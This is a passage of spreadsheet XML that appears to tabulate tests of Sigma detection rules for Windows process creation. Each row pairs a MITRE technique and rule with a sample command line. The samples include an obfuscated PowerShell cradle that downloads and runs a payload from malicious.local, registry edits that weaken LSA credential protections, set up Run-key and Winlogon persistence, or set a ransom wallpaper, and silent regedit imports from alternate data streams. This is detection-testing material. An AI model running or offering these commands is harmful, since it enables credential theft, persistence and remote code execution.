      <c r="K2966" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2967" ht="15.75" customHeight="1" s="42">
      <c r="A2967" s="43" t="inlineStr">
        <is>
          <t>t1027.009</t>
        </is>
      </c>
      <c r="B2967" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_token_obfuscation</t>
        </is>
      </c>
      <c r="C2967" s="43" t="inlineStr">
        <is>
          <t>Powershell Token Obfuscation - Process Creation</t>
        </is>
      </c>
      <c r="D2967" s="43" t="inlineStr">
        <is>
          <t>deb9b646-a508-44ee-b7c9-d8965921c6b6</t>
        </is>
      </c>
      <c r="E2967" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp;('In'+'vOke-Expre'+'ssion') (.('Ne'+'w-Ob'+'ject') Net.WebClient).DownloadString('http://malicious.local/payload')"</t>
        </is>
      </c>
      <c r="F2967" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2967" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2967" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2967" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2967" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2967" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2968" ht="15.75" customHeight="1" s="42">
      <c r="A2968" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2968" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_desktop_background_change</t>
        </is>
      </c>
      <c r="C2968" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Desktop Background Change Using Reg.EXE</t>
        </is>
      </c>
      <c r="D2968" s="43" t="inlineStr">
        <is>
          <t>8cbc9475-8d05-4e27-9c32-df960716c701</t>
        </is>
      </c>
      <c r="E2968" s="43" t="inlineStr">
        <is>
          <t>reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\\ProgramData\\ransom.jpg" /f</t>
        </is>
      </c>
      <c r="F2968" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2968" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2968" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2968" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Desktop Background Change Using Reg.EXE (8cbc9475-8d05-4e27-9c32-df960716c701)</t>
        </is>
      </c>
      <c r="J2968" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2968" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2969" ht="15.75" customHeight="1" s="42">
      <c r="A2969" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2969" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_import_from_suspicious_paths</t>
        </is>
      </c>
      <c r="C2969" s="43" t="inlineStr">
        <is>
          <t>Potential Suspicious Registry File Imported Via Reg.EXE</t>
        </is>
      </c>
      <c r="D2969" s="43" t="inlineStr">
        <is>
          <t>62e0298b-e994-4189-bc87-bc699aa62d97</t>
        </is>
      </c>
      <c r="E2969" s="43" t="inlineStr">
        <is>
          <t>reg.exe import C:\Windows\Temp\payload.reg</t>
        </is>
      </c>
      <c r="F2969" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2969" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2969" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2969" s="43" t="inlineStr">
        <is>
          <t>Potential Suspicious Registry File Imported Via Reg.EXE (62e0298b-e994-4189-bc87-bc699aa62d97)</t>
        </is>
      </c>
      <c r="J2969" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2969" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2970" ht="15.75" customHeight="1" s="42">
      <c r="A2970" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2970" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_import_from_suspicious_paths</t>
        </is>
      </c>
      <c r="C2970" s="43" t="inlineStr">
        <is>
          <t>Potential Suspicious Registry File Imported Via Reg.EXE</t>
        </is>
      </c>
      <c r="D2970" s="43" t="inlineStr">
        <is>
          <t>62e0298b-e994-4189-bc87-bc699aa62d97</t>
        </is>
      </c>
      <c r="E2970" s="43" t="inlineStr">
        <is>
          <t>reg import C:\Users\User\AppData\Local\Temp\settings.reg</t>
        </is>
      </c>
      <c r="F2970" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2970" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2970" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2970" s="43" t="inlineStr">
        <is>
          <t>Potential Suspicious Registry File Imported Via Reg.EXE (62e0298b-e994-4189-bc87-bc699aa62d97)</t>
        </is>
      </c>
      <c r="J2970" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2970" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2971" ht="15.75" customHeight="1" s="42">
      <c r="A2971" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2971" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_import_from_suspicious_paths</t>
        </is>
      </c>
      <c r="C2971" s="43" t="inlineStr">
        <is>
          <t>Potential Suspicious Registry File Imported Via Reg.EXE</t>
        </is>
      </c>
      <c r="D2971" s="43" t="inlineStr">
        <is>
          <t>62e0298b-e994-4189-bc87-bc699aa62d97</t>
        </is>
      </c>
      <c r="E2971" s="43" t="inlineStr">
        <is>
          <t>reg.exe  import  "C:\ProgramData\malicious.reg"</t>
        </is>
      </c>
      <c r="F2971" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2971" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2971" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2971" s="43" t="inlineStr">
        <is>
          <t>Potential Suspicious Registry File Imported Via Reg.EXE (62e0298b-e994-4189-bc87-bc699aa62d97)</t>
        </is>
      </c>
      <c r="J2971" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2971" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2972" ht="15.75" customHeight="1" s="42">
      <c r="A2972" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2972" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_lsa_disable_restricted_admin</t>
        </is>
      </c>
      <c r="C2972" s="43" t="inlineStr">
        <is>
          <t>RestrictedAdminMode Registry Value Tampering - ProcCreation</t>
        </is>
      </c>
      <c r="D2972" s="43" t="inlineStr">
        <is>
          <t>28ac00d6-22d9-4a3c-927f-bbd770104573</t>
        </is>
      </c>
      <c r="E2972" s="43" t="inlineStr">
        <is>
          <t>reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "DisableRestrictedAdmin" /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F2972" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2972" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2972" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2972" s="43" t="inlineStr">
        <is>
          <t>RestrictedAdminMode Registry Value Tampering - ProcCreation (28ac00d6-22d9-4a3c-927f-bbd770104573); RestrictedAdminMode Registry Value Tampering - ProcCreation (28ac00d6-22d9-4a3c-927f-bbd770104573)</t>
        </is>
      </c>
      <c r="J2972" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2972" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2973" ht="15.75" customHeight="1" s="42">
      <c r="A2973" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2973" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_nolmhash</t>
        </is>
      </c>
      <c r="C2973" s="43" t="inlineStr">
        <is>
          <t>Enable LM Hash Storage - ProcCreation</t>
        </is>
      </c>
      <c r="D2973" s="43" t="inlineStr">
        <is>
          <t>98dedfdd-8333-49d4-9f23-d7018cccae53</t>
        </is>
      </c>
      <c r="E2973" s="43" t="inlineStr">
        <is>
          <t>reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v NoLMHash /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F2973" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2973" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2973" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2973" s="43" t="inlineStr">
        <is>
          <t>Enable LM Hash Storage - ProcCreation (98dedfdd-8333-49d4-9f23-d7018cccae53); Enable LM Hash Storage - ProcCreation (98dedfdd-8333-49d4-9f23-d7018cccae53)</t>
        </is>
      </c>
      <c r="J2973" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2973" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2974" ht="15.75" customHeight="1" s="42">
      <c r="A2974" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2974" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_nolmhash</t>
        </is>
      </c>
      <c r="C2974" s="43" t="inlineStr">
        <is>
          <t>Enable LM Hash Storage - ProcCreation</t>
        </is>
      </c>
      <c r="D2974" s="43" t="inlineStr">
        <is>
          <t>98dedfdd-8333-49d4-9f23-d7018cccae53</t>
        </is>
      </c>
      <c r="E2974" s="43" t="inlineStr">
        <is>
          <t>reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v NoLMHash /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F2974" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2974" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2974" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2974" s="43" t="inlineStr">
        <is>
          <t>Enable LM Hash Storage - ProcCreation (98dedfdd-8333-49d4-9f23-d7018cccae53); Enable LM Hash Storage - ProcCreation (98dedfdd-8333-49d4-9f23-d7018cccae53)</t>
        </is>
      </c>
      <c r="J2974" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2974" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2975" ht="15.75" customHeight="1" s="42">
      <c r="A2975" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2975" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_nolmhash</t>
        </is>
      </c>
      <c r="C2975" s="43" t="inlineStr">
        <is>
          <t>Enable LM Hash Storage - ProcCreation</t>
        </is>
      </c>
      <c r="D2975" s="43" t="inlineStr">
        <is>
          <t>98dedfdd-8333-49d4-9f23-d7018cccae53</t>
        </is>
      </c>
      <c r="E2975" s="43" t="inlineStr">
        <is>
          <t>reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "NoLMHash" /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F2975" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2975" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2975" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2975" s="43" t="inlineStr">
        <is>
          <t>Enable LM Hash Storage - ProcCreation (98dedfdd-8333-49d4-9f23-d7018cccae53); Enable LM Hash Storage - ProcCreation (98dedfdd-8333-49d4-9f23-d7018cccae53)</t>
        </is>
      </c>
      <c r="J2975" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2975" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2976" ht="15.75" customHeight="1" s="42">
      <c r="A2976" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2976" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_susp_paths</t>
        </is>
      </c>
      <c r="C2976" s="43" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths</t>
        </is>
      </c>
      <c r="D2976" s="43" t="inlineStr">
        <is>
          <t>b7e2a8d4-74bb-4b78-adc9-3f92af2d4829</t>
        </is>
      </c>
      <c r="E2976" s="43" t="inlineStr">
        <is>
          <t>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\" /v Shell /t REG_SZ /d "explorer.exe" /f</t>
        </is>
      </c>
      <c r="F2976" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2976" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2976" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2976" s="43" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths (b7e2a8d4-74bb-4b78-adc9-3f92af2d4829)</t>
        </is>
      </c>
      <c r="J2976" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2976" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2977" ht="15.75" customHeight="1" s="42">
      <c r="A2977" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2977" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_susp_paths</t>
        </is>
      </c>
      <c r="C2977" s="43" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths</t>
        </is>
      </c>
      <c r="D2977" s="43" t="inlineStr">
        <is>
          <t>b7e2a8d4-74bb-4b78-adc9-3f92af2d4829</t>
        </is>
      </c>
      <c r="E2977" s="43" t="inlineStr">
        <is>
          <t>reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "LegitimateApp" /t REG_SZ /d "legit_app.exe" /f</t>
        </is>
      </c>
      <c r="F2977" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2977" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2977" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2977" s="43" t="inlineStr">
        <is>
          <t>Potential Persistence Attempt Via Run Keys Using Reg.EXE (de587dce-915e-4218-aac4-835ca6af6f70)</t>
        </is>
      </c>
      <c r="J2977" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2977" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2978" ht="15.75" customHeight="1" s="42">
      <c r="A2978" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2978" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_susp_paths</t>
        </is>
      </c>
      <c r="C2978" s="43" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths</t>
        </is>
      </c>
      <c r="D2978" s="43" t="inlineStr">
        <is>
          <t>b7e2a8d4-74bb-4b78-adc9-3f92af2d4829</t>
        </is>
      </c>
      <c r="E2978" s="43" t="inlineStr">
        <is>
          <t>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d 1 /f</t>
        </is>
      </c>
      <c r="F2978" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2978" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2978" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2978" s="43" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths (b7e2a8d4-74bb-4b78-adc9-3f92af2d4829)</t>
        </is>
      </c>
      <c r="J2978" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2978" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2979" ht="15.75" customHeight="1" s="42">
      <c r="A2979" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2979" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_susp_paths</t>
        </is>
      </c>
      <c r="C2979" s="43" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths</t>
        </is>
      </c>
      <c r="D2979" s="43" t="inlineStr">
        <is>
          <t>b7e2a8d4-74bb-4b78-adc9-3f92af2d4829</t>
        </is>
      </c>
      <c r="E2979" s="43" t="inlineStr">
        <is>
          <t>reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\OOBE" /v "BypassNRO" /t REG_DWORD /d 1 /f</t>
        </is>
      </c>
      <c r="F2979" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2979" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2979" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2979" s="43" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths (b7e2a8d4-74bb-4b78-adc9-3f92af2d4829)</t>
        </is>
      </c>
      <c r="J2979" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2979" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2980" ht="15.75" customHeight="1" s="42">
      <c r="A2980" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2980" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_susp_paths</t>
        </is>
      </c>
      <c r="C2980" s="43" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths</t>
        </is>
      </c>
      <c r="D2980" s="43" t="inlineStr">
        <is>
          <t>b7e2a8d4-74bb-4b78-adc9-3f92af2d4829</t>
        </is>
      </c>
      <c r="E2980" s="43" t="inlineStr">
        <is>
          <t>reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" /v Shell /t REG_SZ /d "explorer.exe" /f</t>
        </is>
      </c>
      <c r="F2980" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2980" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2980" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2980" s="43" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths (b7e2a8d4-74bb-4b78-adc9-3f92af2d4829)</t>
        </is>
      </c>
      <c r="J2980" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2980" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2981" ht="15.75" customHeight="1" s="42">
      <c r="A2981" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2981" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_import_keys</t>
        </is>
      </c>
      <c r="C2981" s="43" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File</t>
        </is>
      </c>
      <c r="D2981" s="43" t="inlineStr">
        <is>
          <t>73bba97f-a82d-42ce-b315-9182e76c57b1</t>
        </is>
      </c>
      <c r="E2981" s="43" t="inlineStr">
        <is>
          <t>regedit.exe /s\t malicious.reg</t>
        </is>
      </c>
      <c r="F2981" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2981" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2981" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2981" s="43" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1)</t>
        </is>
      </c>
      <c r="J2981" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2981" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2982" ht="15.75" customHeight="1" s="42">
      <c r="A2982" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2982" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_import_keys</t>
        </is>
      </c>
      <c r="C2982" s="43" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File</t>
        </is>
      </c>
      <c r="D2982" s="43" t="inlineStr">
        <is>
          <t>73bba97f-a82d-42ce-b315-9182e76c57b1</t>
        </is>
      </c>
      <c r="E2982" s="43" t="inlineStr">
        <is>
          <t>regedit.exe /S .\malicious.reg</t>
        </is>
      </c>
      <c r="F2982" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2982" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2982" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2982" s="43" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1)</t>
        </is>
      </c>
      <c r="J2982" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2982" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2983" ht="15.75" customHeight="1" s="42">
      <c r="A2983" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2983" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_import_keys</t>
        </is>
      </c>
      <c r="C2983" s="43" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File</t>
        </is>
      </c>
      <c r="D2983" s="43" t="inlineStr">
        <is>
          <t>73bba97f-a82d-42ce-b315-9182e76c57b1</t>
        </is>
      </c>
      <c r="E2983" s="43" t="inlineStr">
        <is>
          <t>regedit.exe /s"malicious.reg"</t>
        </is>
      </c>
      <c r="F2983" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2983" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2983" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2983" s="43" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1)</t>
        </is>
      </c>
      <c r="J2983" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2983" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2984" ht="15.75" customHeight="1" s="42">
      <c r="A2984" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2984" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_import_keys</t>
        </is>
      </c>
      <c r="C2984" s="43" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File</t>
        </is>
      </c>
      <c r="D2984" s="43" t="inlineStr">
        <is>
          <t>73bba97f-a82d-42ce-b315-9182e76c57b1</t>
        </is>
      </c>
      <c r="E2984" s="43" t="inlineStr">
        <is>
          <t>regedit.exe /s malicious.REG</t>
        </is>
      </c>
      <c r="F2984" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2984" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2984" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2984" s="43" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1)</t>
        </is>
      </c>
      <c r="J2984" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2984" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2985" ht="15.75" customHeight="1" s="42">
      <c r="A2985" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2985" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_import_keys</t>
        </is>
      </c>
      <c r="C2985" s="43" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File</t>
        </is>
      </c>
      <c r="D2985" s="43" t="inlineStr">
        <is>
          <t>73bba97f-a82d-42ce-b315-9182e76c57b1</t>
        </is>
      </c>
      <c r="E2985" s="43" t="inlineStr">
        <is>
          <t>regedit.exe /s C:\malicious.reg</t>
        </is>
      </c>
      <c r="F2985" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2985" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2985" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2985" s="43" t="inlineStr">
        <is>
          <t>Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1)</t>
        </is>
      </c>
      <c r="J2985" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2985" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2986" ht="15.75" customHeight="1" s="42">
      <c r="A2986" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2986" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_import_keys_ads</t>
        </is>
      </c>
      <c r="C2986" s="43" t="inlineStr">
        <is>
          <t>Imports Registry Key From an ADS</t>
        </is>
      </c>
      <c r="D2986" s="43" t="inlineStr">
        <is>
          <t>0b80ade5-6997-4b1d-99a1-71701778ea61</t>
        </is>
      </c>
      <c r="E2986" s="43" t="inlineStr">
        <is>
          <t>regedit.exe /s "C:\path\to\file.txt:script.reg"</t>
        </is>
      </c>
      <c r="F2986" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2986" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2986" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2986" s="43" t="inlineStr">
        <is>
          <t>Imports Registry Key From an ADS (0b80ade5-6997-4b1d-99a1-71701778ea61); Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1)</t>
        </is>
      </c>
      <c r="J2986" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2986" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2987" ht="15.75" customHeight="1" s="42">
      <c r="A2987" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2987" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_import_keys_ads</t>
        </is>
      </c>
      <c r="C2987" s="43" t="inlineStr">
        <is>
          <t>Imports Registry Key From an ADS</t>
        </is>
      </c>
      <c r="D2987" s="43" t="inlineStr">
        <is>
          <t>0b80ade5-6997-4b1d-99a1-71701778ea61</t>
        </is>
      </c>
      <c r="E2987" s="43" t="inlineStr">
        <is>
          <t>regedit.exe /s 'C:\path\to\file.txt:script.reg'</t>
        </is>
      </c>
      <c r="F2987" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2987" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2987" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2987" s="43" t="inlineStr">
        <is>
          <t>Imports Registry Key From an ADS (0b80ade5-6997-4b1d-99a1-71701778ea61); Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1)</t>
        </is>
      </c>
      <c r="J2987" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2987" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2988" ht="15.75" customHeight="1" s="42">
      <c r="A2988" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2988" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_import_keys_ads</t>
        </is>
      </c>
      <c r="C2988" s="43" t="inlineStr">
        <is>
          <t>Imports Registry Key From an ADS</t>
        </is>
      </c>
      <c r="D2988" s="43" t="inlineStr">
        <is>
          <t>0b80ade5-6997-4b1d-99a1-71701778ea61</t>
        </is>
      </c>
      <c r="E2988" s="43" t="inlineStr">
        <is>
          <t>regedit.exe /s C:\path\to\file.txt:script.reg</t>
        </is>
      </c>
      <c r="F2988" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2988" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2988" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2988" s="43" t="inlineStr">
        <is>
          <t>Imports Registry Key From an ADS (0b80ade5-6997-4b1d-99a1-71701778ea61); Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1)</t>
        </is>
      </c>
      <c r="J2988" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2988" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2989" ht="15.75" customHeight="1" s="42">
      <c r="A2989" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2989" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_import_keys_ads</t>
        </is>
      </c>
      <c r="C2989" s="43" t="inlineStr">
        <is>
          <t>Imports Registry Key From an ADS</t>
        </is>
      </c>
      <c r="D2989" s="43" t="inlineStr">
        <is>
          <t>0b80ade5-6997-4b1d-99a1-71701778ea61</t>
        </is>
      </c>
      <c r="E2989" s="43" t="inlineStr">
        <is>
          <t>regedit.exe /s "C:\path\to\file.txt:hidden.reg"</t>
        </is>
      </c>
      <c r="F2989" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2989" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2989" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2989" s="43" t="inlineStr">
        <is>
          <t>Imports Registry Key From an ADS (0b80ade5-6997-4b1d-99a1-71701778ea61); Imports Registry Key From a File (73bba97f-a82d-42ce-b315-9182e76c57b1)</t>
        </is>
      </c>
      <c r="J2989" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2989" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2990" ht="15.75" customHeight="1" s="42">
      <c r="A2990" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2990" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regedit_import_keys_ads</t>
        </is>
      </c>
      <c r="C2990" s="43" t="inlineStr">
        <is>
          <t>Imports Registry Key From an ADS</t>
        </is>
      </c>
      <c r="D2990" s="43" t="inlineStr">
        <is>
          <t>0b80ade5-6997-4b1d-99a1-71701778ea61</t>
        </is>
      </c>
      <c r="E2990" s="43" t="inlineStr">
        <is>
          <t>regedit.exe /s "C:\temp\file.txt:payload.reg"</t>
        </is>
      </c>
      <c r="F2990" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2990" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2990" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2990" s="43" t="inlineStr">
        <is>
